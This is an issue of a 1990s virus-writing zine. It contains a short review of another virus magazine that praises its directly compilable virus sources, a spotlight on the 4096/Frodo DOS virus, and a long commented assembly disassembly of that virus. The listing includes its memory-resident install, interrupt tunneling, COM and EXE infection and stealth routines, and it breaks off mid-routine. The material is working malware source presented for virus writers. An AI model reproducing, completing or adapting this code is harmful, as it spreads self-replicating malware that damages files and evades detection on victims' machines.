+ By: [Hacking Hell]------------------------------Immortal Virus Magazine--------------------------
+-----------------------------------Issue 95.1----------------------------------
+--------------------------------Other Virus Mags-------------------------------
+
+In this issue: 40-HEX by Phalcon/Skism (Creators of PS-MPC).
+
+This magazine is really OK. It contains a lot of USEFULL information, a lot
+ of virus sources / spotlights / hex-scripts, the creators put their own
+ PS-MPC 0.90� in issue 8, that was really k00l! My main interrests in 40HEX
+ are most of the time the virus sources, you can get some k00l ideas out of
+ that. They use the normal english / american language instead of some
+ funky written language.
+
+- The virus spotlights contain various information on a specific virus,
+ just like our spotlights.
+
+- The virus sources / scripts are mostly direct compilable / debuggable,
+ so you don't have to write your own stuff in it, that's really k00l!
+
+- 40-HEX 1 / 14 are available on our (and many other's) WHQ:
+
+            Arrested Development: +31 77-547477
+
+Written by: The FOXMan------------------------------Immortal Virus Magazine--------------------------
+-----------------------------------Issue 95.1----------------------------------
+------------------------------Spotlight: 4096 / Frodo--------------------------
+
+Isolated: January, 1990
+Origin  : Israel
+Type    : Parasitic Memory-Resident .COM and .EXE infector
+Symptoms: A lot of cross-linked files, decrease of free memory,
+           when not loaded increase of file-size.
+
+This huge virus was pretty smart for its time, the virus places itselve in
+ (high-) memory and uses a basic tunneling technique, it infects both .COM
+ and .EXE files, it infects on execution of .COM and .EXE files, the virus
+ contains a bootsector, altough this will not be written in any way onto
+ a disk (Patricia Hoffman says there is a bug in the virus!), if the boot-
+ sector is written manually to the disk, a message will appear on loading:
+     'FRODO LIVES', On 22 september your system will hang (Or is this the
+ bug?!?) this is the birthday of Bilbo and Frodo Braggin in The Lord Of The
+ Rings by Tolkien (Maybe the author of 4096 was a very big fan!). Also the
+ virus slowly crosslinks files on your harddisk, so the files will be
+ permanently damaged! The virus is stealth, and when the virus is loaded into
+ memory the filesize growth will not be seen!
+
+-------------------------------------<CUT>-------------------------------------
+
+_4096           segment byte public
+                assume  cs:_4096, ds:_4096
+
+; 4096 Virus disassembly by Phalcon/Skism, used in IVM-95-1
+; Download IVM-95 it's a very good virus-magazine!
+; Our WHQ: Arrested Development: +31 (0)77-547477
+; Parasitic memory resident .COM and .EXE infector.
+                org     0
+startvirus:
+                db      0
+                jmp     installvirus
+oldheader: ; original 1Ch bytes of the carrier file
+                retn
+                db      75h,02,44h,15h,46h,20h
+                db      'Copyright Bourb%}i, I'
+endoldheader:
+EXEflag         db       00h
+                db      0FEh, 3Ah
+
+int1: ; locate the BIOS or DOS entry point for int 13h and int 21h
+                push    bp                      ; set up stack frame
+                mov     bp,sp
+                push    ax
+                cmp     word ptr [bp+4],0C000h  ; in BIOS?
+                jnb     foundorigint            ; nope, haven't found it
+                mov     ax,cs:DOSsegment        ; in DOS?
+                cmp     [bp+4],ax
+                jbe     foundorigint
+exitint1:
+                pop     ax
+                pop     bp
+                iret
+foundorigint:
+                cmp     byte ptr cs:tracemode,1
+                jz      tracemode1
+                mov     ax,[bp+4]               ; save segment of entry point
+                mov     word ptr cs:origints+2,ax
+                mov     ax,[bp+2]               ; save offset of entry point
+                mov     word ptr cs:origints,ax
+                jb      finishint1
+                pop     ax
+                pop     bp
+                mov     ss,cs:savess            ; restore the stack to its
+                mov     sp,cs:savesp            ; original state
+                mov     al,cs:saveIMR           ; Restore IMR
+                out     21h,al                  ; (enable interrupts)
+                jmp     setvirusints
+finishint1:
+                and     word ptr [bp+6],0FEFFh  ; turn off trap flag
+                mov     al,cs:saveIMR           ; and restore IMR
+                out     21h,al
+                jmp     short exitint1
+tracemode1:
+                dec     byte ptr cs:instructionstotrace
+                jnz     exitint1
+                and     word ptr [bp+6],0FEFFh  ; turn off trap flag
+                call    saveregs
+                call    swapvirint21            ; restore original int
+                lds     dx,dword ptr cs:oldint1 ; 21h & int 1 handlers
+                mov     al,1
+                call    setvect
+                call    restoreregs
+                jmp     short finishint1
+
+getint:
+                push    ds
+                push    si
+                xor     si,si                   ; clear si
+                mov     ds,si                   ; ds->interrupt table
+                xor     ah,ah                   ; cbw would be better!?
+                mov     si,ax
+                shl     si,1                    ; convert int # to offset in
+                shl     si,1                    ; interrupt table (int # x 4)
+                mov     bx,[si]                 ; es:bx = interrupt vector
+                mov     es,[si+2]               ; get old interrupt vector
+                                                ; save 3 bytes if use les bx,[si]
+                pop     si
+                pop     ds
+                retn
+
+installvirus:
+                mov     word ptr cs:stackptr,offset topstack
+                mov     cs:initialax,ax         ; save initial value for ax
+                mov     ah,30h                  ; Get DOS version
+                int     21h
+
+                mov     cs:DOSversion,al        ; Save DOS version
+                mov     cs:carrierPSP,ds        ; Save PSP segment
+                mov     ah,52h                  ; Get list of lists
+                int     21h
+
+                mov     ax,es:[bx-2]            ; segment of first MCB
+                mov     cs:DOSsegment,ax        ; save it for use in int 1
+                mov     es,ax                   ; es = segment first MCB
+                mov     ax,es:[1]               ; Get owner of first MCB
+                mov     cs:ownerfirstMCB,ax     ; save it
+                push    cs
+                pop     ds
+                mov     al,1                    ; get single step vector
+                call    getint
+                mov     word ptr ds:oldint1,bx  ; save it for later
+                mov     word ptr ds:oldint1+2,es; restoration
+                mov     al,21h                  ; get int 21h vector
+                call    getint
+                mov     word ptr ds:origints,bx
+                mov     word ptr ds:origints+2,es
+                mov     byte ptr ds:tracemode,0 ; regular trace mode on
+                mov     dx,offset int1          ; set new int 1 handler
+                mov     al,1
+                call    setvect
+                pushf
+                pop     ax
+                or      ax,100h                 ; turn on trap flag
+                push    ax
+                in      al,21h                  ; Get old IMR
+                mov     ds:saveIMR,al
+                mov     al,0FFh                 ; disable all interrupts
+                out     21h,al
+                popf
+                mov     ah,52h                  ; Get list of lists
+                pushf                           ; (for tracing purposes)
+                call    dword ptr ds:origints   ; perform the tunnelling
+                pushf
+                pop     ax
+                and     ax,0FEFFh               ; turn off trap flag
+                push    ax
+                popf
+                mov     al,ds:saveIMR           ; reenable interrupts
+                out     21h,al
+                push    ds
+                lds     dx,dword ptr ds:oldint1
+                mov     al,1                    ; restore int 1 to the
+                call    setvect                 ; original handler
+                pop     ds
+                les     di,dword ptr ds:origints; set up int 21h handlers
+                mov     word ptr ds:oldint21,di
+                mov     word ptr ds:oldint21+2,es
+                mov     byte ptr ds:jmpfarptr,0EAh ; jmp far ptr
+                mov     word ptr ds:int21store,offset otherint21
+                mov     word ptr ds:int21store+2,cs
+                call    swapvirint21            ; activate virus in memory
+                mov     ax,4B00h
+                mov     ds:checkres,ah          ; set resident flag to a
+                                                ; dummy value
+                mov     dx,offset EXEflag+1     ; save EXE flag
+                push    word ptr ds:EXEflag
+                int     21h                     ; installation check
+                                                ; returns checkres=0 if
+                                                ; installed
+
+                pop     word ptr ds:EXEflag     ; restore EXE flag
+                add     word ptr es:[di-4],9
+                nop                             ; !?
+                mov     es,ds:carrierPSP        ; restore ES and DS to their
+                mov     ds,ds:carrierPSP        ; original values
+                sub     word ptr ds:[2],(topstack/10h)+1
+                                                ; alter top of memory in PSP
+                mov     bp,ds:[2]               ; get segment
+                mov     dx,ds
+                sub     bp,dx
+                mov     ah,4Ah                  ; Find total available memory
+                mov     bx,0FFFFh
+                int     21h
+
+                mov     ah,4Ah                  ; Allocate all available memory
+                int     21h
+
+                dec     dx                      ; go to MCB of virus memory
+                mov     ds,dx
+                cmp     byte ptr ds:[0],'Z'     ; is it the last block?
+                je      carrierislastMCB
+                dec     byte ptr cs:checkres    ; mark need to install virus
+carrierislastMCB:
+                cmp     byte ptr cs:checkres,0  ; need to install?
+                je      playwithMCBs            ; nope, go play with MCBs
+                mov     byte ptr ds:[0],'M'     ; mark not end of chain
+playwithMCBs:
+                mov     ax,ds:[3]               ; get memory size controlled
+                mov     bx,ax                   ; by the MCB
+                sub     ax,(topstack/10h)+1     ; calculate new size
+                add     dx,ax                   ; find high memory segment
+                mov     ds:[3],ax               ; put new size in MCB
+                inc     dx                      ; one more for the MCB
+                mov     es,dx                   ; es->high memory MCB
+                mov     byte ptr es:[0],'Z'     ; mark end of chain
+                push    word ptr cs:ownerfirstMCB ; get DOS PSP ID
+                pop     word ptr es:[1]         ; make it the owner
+                mov     word ptr es:[3],160h    ; fill in the size field
+                inc     dx
+                mov     es,dx                   ; es->high memory area
+                push    cs
+                pop     ds
+                mov     cx,(topstack/2)         ; zopy 0-1600h to high memory
+                mov     si,offset topstack-2
+                mov     di,si
+                std                             ; zopy backwards
+                rep     movsw
+                cld
+                push    es                      ; set up stack for jmp into
+                mov     ax,offset highentry     ; virus code in high memory
+                push    ax
+                mov     es,cs:carrierPSP        ; save current PSP segment
+                mov     ah,4Ah                  ; Alter memory allocation
+                mov     bx,bp                   ; bx = paragraphs
+                int     21h
+                retf                            ; jmp to virus code in high
+highentry:                                      ; memory
+                call    swapvirint21
+                mov     word ptr cs:int21store+2,cs
+                call    swapvirint21
+                push    cs
+                pop     ds
+                mov     byte ptr ds:handlesleft,14h ; reset free handles count
+                push    cs
+                pop     es
+                mov     di,offset handletable
+                mov     cx,14h
+                xor     ax,ax                   ; clear handle table
+                rep     stosw
+                mov     ds:hideclustercountchange,al ; clear the flag
+                mov     ax,ds:carrierPSP
+                mov     es,ax                   ; es->PSP
+                lds     dx,dword ptr es:[0Ah]   ; get terminate vector (why?)
+                mov     ds,ax                   ; ds->PSP
+                add     ax,10h                  ; adjust for PSP
+                add     word ptr cs:oldheader+16h,ax ; adjust jmp location
+                cmp     byte ptr cs:EXEflag,0   ; for PSP
+                jne     returntoEXE
+returntoCOM:
+                sti
+                mov     ax,word ptr cs:oldheader; restore first 6 bytes of the
+                mov     ds:[100h],ax            ; COM file
+                mov     ax,word ptr cs:oldheader+2
+                mov     ds:[102h],ax
+                mov     ax,word ptr cs:oldheader+4
+                mov     ds:[104h],ax
+                push    word ptr cs:carrierPSP  ; Segment of carrier file's
+                mov     ax,100h                 ; PSP
+                push    ax
+                mov     ax,cs:initialax         ; restore orig. value of ax
+                retf                            ; return to original COM file
+
+returntoEXE:
+                add     word ptr cs:oldheader+0eh,ax
+                mov     ax,cs:initialax         ; Restore ax
+                mov     ss,word ptr cs:oldheader+0eh ; Restore stack to
+                mov     sp,word ptr cs:oldheader+10h ; original value
+                sti
+                jmp     dword ptr cs:oldheader+14h ; jmp to original cs:IP
+                                                ; entry point
+entervirus:
+                cmp     sp,100h                 ; COM file?
+                ja      dont_resetstack         ; if so, skip this
+                xor     sp,sp                   ; new stack
+dont_resetstack:
+                mov     bp,ax
+                call    next                    ; calculate relativeness
+next:
+                pop     cx
+                sub     cx,offset next          ; cx = delta offset
+                mov     ax,cs                   ; ax = segment
+                mov     bx,10h                  ; convert to offset
+                mul     bx
+                add     ax,cx
+                adc     dx,0
+                div     bx                      ; convert to seg:off
+                push    ax                      ; set up stack for jmp
+                mov     ax,offset installvirus  ; to installvirus
+                push    ax
+                mov     ax,bp
+                retf                            ; go to installvirus
+
+int21commands:
+                db      30h     ; get DOS version
+                dw      offset getDOSversion
+                db      23h     ; FCB get file size
+                dw      offset FCBgetfilesize
+                db      37h     ; get device info
+                dw      offset get_device_info
+                db      4Bh     ; execute
+                dw      offset execute
+                db      3Ch     ; create file w/ handle
+                dw      offset createhandle
+                db      3Dh     ; open file
+                dw      offset openhandle
+                db      3Eh     ; close file
+                dw      offset handleclosefile
+                db      0Fh     ; FCB open file
+                dw      offset FCBopenfile
+                db      14h     ; sequential FCB read
+                dw      offset sequentialFCBread
+                db      21h     ; random FCB read
+                dw      offset randomFCBread
+                db      27h     ; random FCB block read
+                dw      offset randomFCBblockread
+                db      11h     ; FCB find first
+                dw      offset FCBfindfirstnext
+                db      12h     ; FCB find next
+                dw      offset FCBfindfirstnext
+                db      4Eh     ; filename find first
+                dw      offset filenamefindfirstnext
+                db      4Fh     ; filename find next
+                dw      offset filenamefindfirstnext
+                db      3Fh     ; read
+                dw      offset handleread
+                db      40h     ; write
+                dw      offset handlewrite
+                db      42h     ; move file pointer
+                dw      offset handlemovefilepointer
+                db      57h     ; get/set file time/date
+                dw      offset getsetfiletimedate
+                db      48h     ; allocate memory
+                dw      offset allocatememory
+endcommands:
+
+otherint21:
+                cmp     ax,4B00h                ; execute?
+                jnz     notexecute
+                mov     cs:checkres,al          ; clear the resident flag
+notexecute:
+                push    bp                      ; set up stack frame
+                mov     bp,sp
+                push    [bp+6]                  ; push old flags
+                pop     cs:int21flags           ; and put in variable
+                pop     bp                      ; why?
+                push    bp                      ; why?
+                mov     bp,sp                   ; set up new stack frame
+                call    saveregs
+                call    swapvirint21            ; reenable DOS int 21h handler
+                call    disableBREAK
+                call    restoreregs
+                call    _pushall
+                push    bx
+                mov     bx,offset int21commands ; bx->command table
+scanforcommand:
+                cmp     ah,cs:[bx]              ; scan for the function
+                jne     findnextcommand         ; code/subroutine combination
+                mov     bx,cs:[bx+1]
+                xchg    bx,[bp-14h]
+                cld
+                retn
+findnextcommand:
+                add     bx,3                    ; go to next command
+                cmp     bx,offset endcommands   ; in the table until
+                jb      scanforcommand          ; there are no more
+                pop     bx
+exitotherint21:
+                call    restoreBREAK
+                in      al,21h                  ; save IMR
+                mov     cs:saveIMR,al
+                mov     al,0FFh                 ; disable all interrupts
+                out     21h,al
+                mov     byte ptr cs:instructionstotrace,4 ; trace into
+                mov     byte ptr cs:tracemode,1           ; oldint21
+                call    replaceint1             ; set virus int 1 handler
+                call    _popall
+                push    ax
+                mov     ax,cs:int21flags        ; get the flags
+                or      ax,100h                 ; turn on the trap flag
+                push    ax                      ; and set it in motion
+                popf
+                pop     ax
+                pop     bp
+                jmp     dword ptr cs:oldint21   ; chain back to original int
+                                                ; 21h handler -- do not return
+
+exitint21:
+                call    saveregs
+                call    restoreBREAK
+                call    swapvirint21
+                call    restoreregs
+                pop     bp
+                push    bp                      ; set up stack frame
+                mov     bp,sp
+                push    word ptr cs:int21flags  ; get the flags and put
+                pop     word ptr [bp+6]         ; them on the stack for
+                pop     bp                      ; the iret
+                iret
+
+FCBfindfirstnext:
+                call    _popall
+                call    callint21
+                or      al,al                   ; Found any files?
+                jnz     exitint21               ; guess not
+                call    _pushall
+                call    getdisktransferaddress
+                mov     al,0
+                cmp     byte ptr [bx],0FFh      ; Extended FCB?
+                jne     findfirstnextnoextendedFCB
+                mov     al,[bx+6]
+                add     bx,7                    ; convert to normal FCB
+findfirstnextnoextendedFCB:
+                and     cs:hide_size,al
+                test    byte ptr [bx+1Ah],80h   ; check year bit for virus
+                jz      _popall_then_exitint21  ; infection tag. exit if so
+                sub     byte ptr [bx+1Ah],0C8h  ; alter file date
+                cmp     byte ptr cs:hide_size,0
+                jne     _popall_then_exitint21
+                sub     word ptr [bx+1Dh],1000h ; hide file size
+                sbb     word ptr [bx+1Fh],0
+_popall_then_exitint21:
+                call    _popall
+                jmp     short exitint21
+
+FCBopenfile:
+                call    _popall
+                call    callint21               ; chain to original int 21h
+                call    _pushall
+                or      al,al                   ; 0 = success
+                jnz     _popall_then_exitint21
+                mov     bx,dx
+                test    byte ptr [bx+15h],80h   ; check if infected yet
+                jz      _popall_then_exitint21
+                sub     byte ptr [bx+15h],0C8h  ; restore date
+                sub     word ptr [bx+10h],1000h ; and hide file size
+                sbb     byte ptr [bx+12h],0
+                jmp     short _popall_then_exitint21
+
+randomFCBblockread:
+                jcxz    go_exitotherint21       ; reading any blocks?
+
+randomFCBread:
+                mov     bx,dx
+                mov     si,[bx+21h]             ; check if reading first
+                or      si,[bx+23h]             ; bytes
+                jnz     go_exitotherint21
+                jmp     short continueFCBread
+
+sequentialFCBread:
+                mov     bx,dx
+                mov     ax,[bx+0Ch]             ; check if reading first
+                or      al,[bx+20h]             ; bytes
+                jnz     go_exitotherint21
+continueFCBread:
+                call    checkFCBokinfect
+                jnc     continuecontinueFCBread
+go_exitotherint21:
+                jmp     exitotherint21
+continuecontinueFCBread:
+                call    _popall
+                call    _pushall
+                call    callint21               ; chain to original handler
+                mov     [bp-4],ax               ; set the return codes
+                mov     [bp-8],cx               ; properly
+                push    ds                      ; save FCB pointer
+                push    dx
+                call    getdisktransferaddress
+                cmp     word ptr [bx+14h],1     ; check for EXE infection
+                je      FCBreadinfectedfile     ; (IP = 1)
+                mov     ax,[bx]                 ; check for COM infection
+                add     ax,[bx+2]               ; (checksum = 0)
+                add     ax,[bx+4]
+                jz      FCBreadinfectedfile
+                add     sp,4                    ; no infection, no stealth
+                jmp     short _popall_then_exitint21 ; needed
+FCBreadinfectedfile:
+                pop     dx                      ; restore address of the FCB
+                pop     ds
+                mov     si,dx
+                push    cs
+                pop     es
+                mov     di,offset tempFCB       ; copy FCB to temporary one
+                mov     cx,25h
+                rep     movsb
+                mov     di,offset tempFCB
+                push    cs
+                pop     ds
+                mov     ax,[di+10h]             ; get old file size
+                mov     dx,[di+12h]
+                add     ax,100Fh                ; increase by virus size
+                adc     dx,0                    ; and round to the nearest
+                and     ax,0FFF0h               ; paragraph
+                mov     [di+10h],ax             ; insert new file size
+                mov     [di+12h],dx
+                sub     ax,0FFCh
+                sbb     dx,0
+                mov     [di+21h],ax             ; set new random record #
+                mov     [di+23h],dx
+                mov     word ptr [di+0Eh],1     ; record size = 1
+                mov     cx,1Ch
+                mov     dx,di
+                mov     ah,27h                  ; random block read 1Ch bytes
+                call    callint21
+                jmp     _popall_then_exitint21
+
+FCBgetfilesize:
+                push    cs
+                pop     es
+                mov     si,dx
+                mov     di,offset tempFCB       ; copy FCB to temp buffer
+                mov     cx,0025h
+                repz    movsb
+                push    ds
+                push    dx
+                push    cs
+                pop     ds
+                mov     dx,offset tempFCB
+                mov     ah,0Fh                  ; FCB open file
+                call    callint21
+                mov     ah,10h                  ; FCB close file
+                call    callint21
+                test    byte ptr [tempFCB+15h],80h ; check date bit
+                pop     si
+                pop     ds
+                jz      will_exitotherint21     ; exit if not infected
+                les     bx,dword ptr cs:[tempFCB+10h] ; get filesize
+                mov     ax,es
+                sub     bx,1000h                ; hide increase
+                sbb     ax,0
+                xor     dx,dx
+                mov     cx,word ptr cs:[tempFCB+0eh] ; get record size
+                dec     cx
+                add     bx,cx
+                adc     ax,0
+                inc     cx
+                div     cx
+                mov     [si+23h],ax             ; fix random access record #
+                xchg    dx,ax
+                xchg    bx,ax
+                div     cx
+                mov     [si+21h],ax             ; fix random access record #
+                jmp     _popall_then_exitint21
+
+filenamefindfirstnext:
+                and     word ptr cs:int21flags,-2 ; turn off trap flag
+                call    _popall
+                call    callint21
+                call    _pushall
+                jnb     filenamefffnOK          ; continue if a file is found
+                or      word ptr cs:int21flags,1
+                jmp     _popall_then_exitint21
+
+filenamefffnOK:
+                call    getdisktransferaddress
+                test    byte ptr [bx+19h],80h   ; Check high bit of date
+                jnz     filenamefffnfileinfected; Bit set if infected
+                jmp     _popall_then_exitint21
+filenamefffnfileinfected:
+                sub     word ptr [bx+1Ah],1000h ; hide file length increase
+                sbb     word ptr [bx+1Ch],0
+                sub     byte ptr [bx+19h],0C8h  ; and date change
+                jmp     _popall_then_exitint21
+
+createhandle:
+                push    cx
+                and     cx,7                    ; mask the attributes
+                cmp     cx,7                    ; r/o, hidden, & system?
+                je      exit_create_handle
+                pop     cx
+                call    replaceint13and24
+                call    callint21               ; chain to original int 21h
+                call    restoreint13and24
+                pushf
+                cmp     byte ptr cs:errorflag,0 ; check if any errors yet
+                je      no_errors_createhandle
+                popf
+will_exitotherint21:
+                jmp     exitotherint21
+no_errors_createhandle:
+                popf
+                jc      other_error_createhandle; exit on error
+                mov     bx,ax                   ; move handle to bx
+                mov     ah,3Eh                  ; Close file
+                call    callint21
+                jmp     short openhandle
+other_error_createhandle:
+                or      byte ptr cs:int21flags,1; turn on the trap flag
+                mov     [bp-4],ax               ; set the return code properly
+                jmp     _popall_then_exitint21
+exit_create_handle:
+                pop     cx
+                jmp     exitotherint21
+
+openhandle:
+                call    getcurrentPSP
+                call    checkdsdxokinfect
+                jc      jmp_exitotherint21
+                cmp     byte ptr cs:handlesleft,0 ; make sure there is a free
+                je      jmp_exitotherint21        ; entry in the table
+                call    setup_infection         ; open the file
+                cmp     bx,0FFFFh               ; error?
+                je      jmp_exitotherint21      ; if so, exit
+                dec     byte ptr cs:handlesleft
+                push    cs
+                pop     es
+                mov     di,offset handletable
+                mov     cx,14h
+                xor     ax,ax                   ; find end of the table
+                repne   scasw
+                mov     ax,cs:currentPSP        ; put the PSP value and the
+                mov     es:[di-2],ax            ; handle # in the table
+                mov     es:[di+26h],bx
+                mov     [bp-4],bx               ; put handle # in return code
+handleopenclose_exit:
+                and     byte ptr cs:int21flags,0FEh ; turn off the trap flag
+                jmp     _popall_then_exitint21
+jmp_exitotherint21:
+                jmp     exitotherint21
+
+handleclosefile:
+                push    cs
+                pop     es
+                call    getcurrentPSP
+                mov     di,offset handletable
+                mov     cx,14h                  ; 14h entries max
+                mov     ax,cs:currentPSP        ; search for calling PSP
+scanhandle_close:
+                repne   scasw
+                jnz     handlenotfound          ; handle not trapped
+                cmp     bx,es:[di+26h]          ; does the handle correspond?
+                jne     scanhandle_close        ; if not, find another handle
+                mov     word ptr es:[di-2],0    ; otherwise, clear handle
+                call    infect_file
+                inc     byte ptr cs:handlesleft ; fix handles left counter
+                jmp     short handleopenclose_exit ; and exit
+handlenotfound:
+                jmp     exitotherint21
+
+getdisktransferaddress:
+                push    es
+                mov     ah,2Fh                  ; Get disk transfer address
+                call    callint21               ; to es:bx
+                push    es
+                pop     ds                      ; mov to ds:bx
+                pop     es
+                retn
+execute:
+                or      al,al                   ; load and execute?
+                jz      loadexecute             ; yepper!
+                jmp     checkloadnoexecute      ; otherwise check if
+                                                ; load/no execute
+loadexecute:
+                push    ds                      ; save filename
+                push    dx
+                mov     word ptr cs:parmblock,bx; save parameter block and
+                mov     word ptr cs:parmblock+2,es; move to ds:si
+                lds     si,dword ptr cs:parmblock
+                mov     di,offset copyparmblock ; copy the parameter block
+                mov     cx,0Eh
+                push    cs
+                pop     es
+                rep     movsb
+                pop     si                      ; copy the filename
+                pop     ds                      ; to the buffer
+                mov     di,offset copyfilename
+                mov     cx,50h
+                rep     movsb
+                mov     bx,0FFFFh
+                call    allocate_memory         ; allocate available memory
+                call    _popall
+                pop     bp                      ; save the parameters
+                pop     word ptr cs:saveoffset  ; on the stack
+                pop     word ptr cs:savesegment
+                pop     word ptr cs:int21flags
+                mov     ax,4B01h                ; load/no execute
+                push    cs                      ; ds:dx -> file name
+                pop     es                      ; es:bx -> parameter block
+                mov     bx,offset copyparmblock
+                pushf                           ; perform interrupt 21h
+                call    dword ptr cs:oldint21
+                jnc     continue_loadexecute    ; continue if no error
+                or      word ptr cs:int21flags,1; turn on trap flag
+                push    word ptr cs:int21flags  ; if error
+                push    word ptr cs:savesegment ; restore stack
+                push    word ptr cs:saveoffset
+                push    bp                      ; restore the stack frame
+                mov     bp,sp                   ; and restore ES:BX to
+                les     bx,dword ptr cs:parmblock ; point to the parameter
+                jmp     exitint21               ; block
+continue_loadexecute:
+                call    getcurrentPSP
+                push    cs
+                pop     es
+                mov     di,offset handletable   ; scan the handle table
+                mov     cx,14h                  ; for the current PSP's
+scanhandle_loadexecute:                         ; handles
+                mov     ax,cs:currentPSP
+                repne   scasw
+                jnz     loadexecute_checkEXE
+                mov     word ptr es:[di-2],0    ; clear entry in handle table
+                inc     byte ptr cs:handlesleft ; fix handlesleft counter
+                jmp     short scanhandle_loadexecute
+loadexecute_checkEXE:
+                lds     si,dword ptr cs:origcsip
+                cmp     si,1                    ; Check if EXE infected
+                jne     loadexecute_checkCOM
+                mov     dx,word ptr ds:oldheader+16h ; get initial CS
+                add     dx,10h                  ; adjust for PSP
+                mov     ah,51h                  ; Get current PSP segment
+                call    callint21
+                add     dx,bx                   ;adjust for start load segment
+                mov     word ptr cs:origcsip+2,dx
+                push    word ptr ds:oldheader+14h       ; save old IP
+                pop     word ptr cs:origcsip
+                add     bx,10h                          ; adjust for the PSP
+                add     bx,word ptr ds:oldheader+0Eh    ; add old SS
+                mov     cs:origss,bx
+                push    word ptr ds:oldheader+10h       ; old SP
+                pop     word ptr cs:origsp
+                jmp     short perform_loadexecute
+loadexecute_checkCOM:
+                mov     ax,[si]                 ; Check if COM infected
+                add     ax,[si+2]
+                add     ax,[si+4]
+                jz      loadexecute_doCOM       ; exit if already infected
+                push    cs                      ; otherwise check to see
+                pop     ds                      ; if it is suitable for
+                mov     dx,offset copyfilename  ; infection
+                call    checkdsdxokinfect
+                call    setup_infection
+                inc     byte ptr cs:hideclustercountchange
+                call    infect_file             ; infect the file
+                dec     byte ptr cs:hideclustercountchange
+perform_loadexecute:
+                mov     ah,51h                  ; Get current PSP segment
+                call    callint21
+                call    saveregs
+                call    restoreBREAK
+                call    swapvirint21
+                call    restoreregs
+                mov     ds,bx                   ; ds = current PSP segment
+                mov     es,bx                   ; es = current PSP segment
+                push    word ptr cs:int21flags  ; restore stack parameters
+                push    word ptr cs:savesegment
+                push    word ptr cs:saveoffset
+                pop     word ptr ds:[0Ah]       ; Set terminate address in PSP
+                pop     word ptr ds:[0Ch]       ; to return address found on
+                                                ; the stack
+                                                ; (int 21h caller CS:IP)
+                push    ds
+                lds     dx,dword ptr ds:[0Ah]   ; Get terminate address in PSP
+                mov     al,22h                  ; Set terminate address to it
+                call    setvect
+                pop     ds
+                popf
+                pop     ax
+                mov     ss,cs:origss            ; restore the stack
+                mov     sp,cs:origsp            ; and
+                jmp     dword ptr cs:origcsip   ; perform the execute
+
+loadexecute_doCOM:
+                mov     bx,[si+1]               ; restore original COM file
+                mov     ax,word ptr ds:[bx+si-261h]
+                mov     [si],ax
+                mov     ax,word ptr ds:[bx+si-25Fh]
+                mov     [si+2],ax
+                mov     ax,word ptr ds:[bx+si-25Dh]
+                mov     [si+4],ax
+                jmp     short perform_loadexecute
+checkloadnoexecute:
+                cmp     al,1
+                je      loadnoexecute
+                jmp     exitotherint21
+loadnoexecute:
+                or      word ptr cs:int21flags,1; turn on trap flag
+                mov     word ptr cs:parmblock,bx; save pointer to parameter
+                mov     word ptr cs:parmblock+2,es ; block
+                call    _popall
+                call    callint21               ; chain to int 21h
+                call    _pushall
+                les     bx,dword ptr cs:parmblock ; restore pointer to
+                                                ; parameter block
+                lds     si,dword ptr es:[bx+12h]; get cs:ip on execute return
+                jc      exit_loadnoexecute
+                and     byte ptr cs:int21flags,0FEh ; turn off trap flag
+                cmp     si,1                    ; check for EXE infection
+                je      loadnoexecute_EXE_already_infected
+                                                ; infected if initial IP = 1
+                mov     ax,[si]                 ; check for COM infection
+                add     ax,[si+2]               ; infected if checksum = 0
+                add     ax,[si+4]
+                jnz     perform_the_execute
+                mov     bx,[si+1]               ; get jmp location
+                mov     ax,ds:[bx+si-261h]      ; restore original COM file
+                mov     [si],ax
+                mov     ax,ds:[bx+si-25Fh]
+                mov     [si+2],ax
+                mov     ax,ds:[bx+si-25Dh]
+                mov     [si+4],ax
+                jmp     short perform_the_execute
+loadnoexecute_EXE_already_infected:
+                mov     dx,word ptr ds:oldheader+16h ; get entry CS:IP
+                call    getcurrentPSP
+                mov     cx,cs:currentPSP
+                add     cx,10h                  ; adjust for PSP
+                add     dx,cx
+                mov     es:[bx+14h],dx          ; alter the entry point CS
+                mov     ax,word ptr ds:oldheader+14h
+                mov     es:[bx+12h],ax
+                mov     ax,word ptr ds:oldheader+0Eh ; alter stack
+                add     ax,cx
+                mov     es:[bx+10h],ax
+                mov     ax,word ptr ds:oldheader+10h
+                mov     es:[bx+0Eh],ax
+perform_the_execute:
+                call    getcurrentPSP
+                mov     ds,cs:currentPSP
+                mov     ax,[bp+2]               ; restore length as held in
+                mov     word ptr ds:oldheader+6,ax
+                mov     ax,[bp+4]               ; the EXE header
+                mov     word ptr ds:oldheader+8,ax
+exit_loadnoexecute:
+                jmp     _popall_then_exitint21
+
+getDOSversion:
+                mov     byte ptr cs:hide_size,0
+                mov     ah,2Ah                  ; Get date
+                call    callint21
+                cmp     dx,916h                 ; September 22?
+                jb      exitDOSversion          ; leave if not
+                call    writebootblock          ; this is broken
+exitDOSversion:
+                jmp     exitotherint21
+
+infect_file:
+                call    replaceint13and24
+                call    findnextparagraphboundary
+                mov     byte ptr ds:EXEflag,1   ; assume is an EXE file
+                cmp     word ptr ds:readbuffer,'ZM' ; check here for regular
+                je      clearlyisanEXE              ; EXE header
+                cmp     word ptr ds:readbuffer,'MZ' ; check here for alternate
+                je      clearlyisanEXE              ; EXE header
+                dec     byte ptr ds:EXEflag         ; if neither, assume is a
+                jz      try_infect_com              ; COM file
+clearlyisanEXE:
+                mov     ax,ds:lengthinpages     ; get file size in pages
+                shl     cx,1                    ; and convert it to
+                mul     cx                      ; bytes
+                add     ax,200h                 ; add 512 bytes
+                cmp     ax,si
+                jb      go_exit_infect_file
+                mov     ax,ds:minmemory         ; make sure min and max memory
+                or      ax,ds:maxmemory         ; are not both zero
+                jz      go_exit_infect_file
+                mov     ax,ds:filesizelow       ; get filesize in dx:ax
+                mov     dx,ds:filesizehigh
+                mov     cx,200h                 ; convert to pages
+                div     cx
+                or      dx,dx                   ; filesize multiple of 512?
+                jz      filesizemultiple512     ; then don't increment #
+                inc     ax                      ; pages
+filesizemultiple512:
+                mov     ds:lengthinpages,ax     ; put in new values for length
+                mov     ds:lengthMOD512,dx      ; fields
+                cmp     word ptr ds:initialIP,1 ; check if already infected
+                je      exit_infect_file
+                mov     word ptr ds:initialIP,1 ; set new entry point
+                mov     ax,si                   ; calculate new entry point
+                sub     ax,ds:headersize        ; segment
+                mov     ds:initialcs,ax         ; put this in for cs
+                add     word ptr ds:lengthinpages,8 ; 4K more
+                mov     ds:initialSS,ax         ; put entry segment in for SS
+                mov     word ptr ds:initialSP,1000h ; set stack @ 1000h
+                call    finish_infection
+go_exit_infect_file:
+                jmp     short exit_infect_file
+try_infect_com:
+                cmp     si,0F00h                ; make sure file is under
+                jae     exit_infect_file        ; F00h paragraphs or else
